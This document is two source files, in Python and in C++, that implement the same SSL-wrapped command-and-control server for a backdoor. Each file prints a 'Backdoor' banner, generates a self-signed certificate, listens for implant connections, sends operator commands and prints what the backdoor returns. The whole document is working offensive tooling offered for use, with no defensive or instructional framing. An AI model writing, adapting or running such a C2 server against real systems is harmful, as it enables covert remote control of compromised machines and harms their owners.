File: Profiles/Backdoor-C2.py
import socket
import ssl
import subprocess
import os

def generate_self_signed_cert(cert_file, key_file):
    """Generate a self-signed certificate and key."""
    cert_cmd = (
        f"openssl req -newkey rsa:2048 -nodes -keyout {key_file} -x509 "
        f"-days 365 -out {cert_file} -subj \"/C=US/ST=State/L=City/O=Organization/OU=OrgUnit/CN=localhost\""
    )
    subprocess.run(cert_cmd, shell=True, check=True)
    print(f"[+] Generated self-signed certificate: {cert_file} and key: {key_file}")

def start_c2_server(cert_file, key_file):
    print("""
  ____             _       _                  
 |  _ \\           | |     | |                 
 | |_) | __ _  ___| | ____| | ___   ___  _ __ 
 |  _ < / _` |/ __| |/ / _` |/ _ \\ / _ \\| '__|
 | |_) | (_| | (__|   < (_| | (_) | (_) | |   
 |____/ \\__,_|\\___|_|\\_\\__,_|\\___/ \\___/|_|   
                                              

""")

    host = input("Enter the IP address to listen on: ")
    port = int(input("Enter the port to listen on: "))

    # Create socket and wrap it with SSL
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(5)

    print("[+] Listening for connections...")

    # Wrap socket with SSL
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    context.load_cert_chain(certfile=cert_file, keyfile=key_file)

    while True:
        client_socket, addr = server_socket.accept()
        ssl_client_socket = context.wrap_socket(client_socket, server_side=True)
        print(f"[+] Secure connection from {addr[0]}:{addr[1]}")

        # Send command to backdoor
        command = input("Enter command to send: ")
        ssl_client_socket.send(command.encode())

        # Receive output from backdoor
        output = b""
        while True:
            data = ssl_client_socket.recv(4096)
            if not data:
                break
            output += data

        print("[+] Binary output from backdoor:")
        try:
            print(output.decode())  # Try decoding as UTF-8
        except UnicodeDecodeError:
            print("[+] Output is not UTF-8 encoded:")
            print(output)

        ssl_client_socket.close()

if __name__ == "__main__":
    CERT_FILE = "server.crt"
    KEY_FILE = "server.key"

    # Generate self-signed certificate if it does not exist
    if not os.path.exists(CERT_FILE) or not os.path.exists(KEY_FILE):
        generate_self_signed_cert(CERT_FILE, KEY_FILE)

    start_c2_server(CERT_FILE, KEY_FILE)

File: Profiles/Backdoor-C2.cpp
//g++ -o Backdoor-C2.o Backdoor-C2.cpp -lssl -lcrypto

#include <iostream>
#include <string>
#include <cstring>
#include <fstream>
#include <cstdlib>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <sys/stat.h>

// Function to check if a file exists
bool fileExists(const std::string& filename) {
    struct stat buffer;
    return (stat(filename.c_str(), &buffer) == 0);
}

// Function to generate a self-signed certificate and key using OpenSSL
void generateSelfSignedCert(const std::string& certFile, const std::string& keyFile) {
    std::string certCmd = "openssl req -newkey rsa:2048 -nodes -keyout " + keyFile +
                          " -x509 -days 365 -out " + certFile + 
                          " -subj \"/C=US/ST=State/L=City/O=Organization/OU=OrgUnit/CN=localhost\"";
    std::system(certCmd.c_str());
    std::cout << "[+] Generated self-signed certificate: " << certFile 
              << " and key: " << keyFile << std::endl;
}

// Function to initialize the OpenSSL library
void initializeSSL() {
    SSL_load_error_strings();
    OpenSSL_add_ssl_algorithms();
}

// Function to clean up OpenSSL
void cleanupSSL() {
    EVP_cleanup();
}

// Function to create an SSL context
SSL_CTX* createSSLContext() {
    const SSL_METHOD* method = TLS_server_method();
    SSL_CTX* ctx = SSL_CTX_new(method);
    if (!ctx) {
        std::cerr << "Unable to create SSL context" << std::endl;
        ERR_print_errors_fp(stderr);
        exit(EXIT_FAILURE);
    }
    return ctx;
}

// Function to configure SSL context with certificate and key
void configureSSLContext(SSL_CTX* ctx, const std::string& certFile, const std::string& keyFile) {
    if (SSL_CTX_use_certificate_file(ctx, certFile.c_str(), SSL_FILETYPE_PEM) <= 0) {
        ERR_print_errors_fp(stderr);
        exit(EXIT_FAILURE);
    }
    if (SSL_CTX_use_PrivateKey_file(ctx, keyFile.c_str(), SSL_FILETYPE_PEM) <= 0) {
        ERR_print_errors_fp(stderr);
        exit(EXIT_FAILURE);
    }
}

// Function to handle the C2 server
void startC2Server(const std::string& certFile, const std::string& keyFile) {
    std::cout << R"(
  ____             _       _                  
 |  _ \           | |     | |                 
 | |_) | __ _  ___| | ____| | ___   ___  _ __ 
 |  _ < / _` |/ __| |/ / _` |/ _ \ / _ \| '__|
 | |_) | (_| | (__|   < (_| | (_) | (_) | |   
 |____/ \__,_|\___|_|\_\__,_|\___/ \___/|_|   
                                              
)" << std::endl;

    // Initialize OpenSSL
    initializeSSL();
    SSL_CTX* ctx = createSSLContext();
    configureSSLContext(ctx, certFile, keyFile);

    // Get host and port information
    std::string host;
    int port;
    std::cout << "Enter the IP address to listen on: ";
    std::cin >> host;
    std::cout << "Enter the port to listen on: ";
    std::cin >> port;

    // Create socket
    int server_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (server_fd == -1) {
        std::cerr << "Failed to create socket" << std::endl;
        return;
    }

    // Bind to IP and port
    struct sockaddr_in server_addr;
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(port);
    server_addr.sin_addr.s_addr = inet_addr(host.c_str());

    if (bind(server_fd, (struct sockaddr*)&server_addr, sizeof(server_addr)) < 0) {
        std::cerr << "Failed to bind to address" << std::endl;
        return;
    }

    // Listen for incoming connections
    if (listen(server_fd, 5) < 0) {
        std::cerr << "Failed to listen on socket" << std::endl;
        return;
    }

    std::cout << "[+] Listening for connections..." << std::endl;

    // Accept incoming connections
    while (true) {
        struct sockaddr_in client_addr;
        socklen_t client_len = sizeof(client_addr);
        int client_fd = accept(server_fd, (struct sockaddr*)&client_addr, &client_len);
        if (client_fd < 0) {
            std::cerr << "Failed to accept connection" << std::endl;
            return;
        }

        // Wrap the client socket with SSL
        SSL* ssl = SSL_new(ctx);
        SSL_set_fd(ssl, client_fd);

        if (SSL_accept(ssl) <= 0) {
            ERR_print_errors_fp(stderr);
        } else {
            std::cout << "[+] Secure connection from " << inet_ntoa(client_addr.sin_addr) 
                      << ":" << ntohs(client_addr.sin_port) << std::endl;

            // Send command to client
            std::string command;
            std::cout << "Enter command to send: ";
            std::cin.ignore();
            std::getline(std::cin, command);

            SSL_write(ssl, command.c_str(), command.length());

            // Receive output from client
            char buffer[4096];
            int bytes;
            std::string output;
            while ((bytes = SSL_read(ssl, buffer, sizeof(buffer))) > 0) {
                output.append(buffer, bytes);
            }

            std::cout << "[+] Binary output from backdoor:\n" << output << std::endl;
        }

        SSL_shutdown(ssl);
        SSL_free(ssl);
        close(client_fd);
    }

    close(server_fd);
    SSL_CTX_free(ctx);
    cleanupSSL();
}

int main() {
    const std::string CERT_FILE = "server.crt";
    const std::string KEY_FILE = "server.key";

    // Generate self-signed certificate if it does not exist
    if (!fileExists(CERT_FILE) || !fileExists(KEY_FILE)) {
        generateSelfSignedCert(CERT_FILE, KEY_FILE);
    }

    startC2Server(CERT_FILE, KEY_FILE);

    return 0;
}

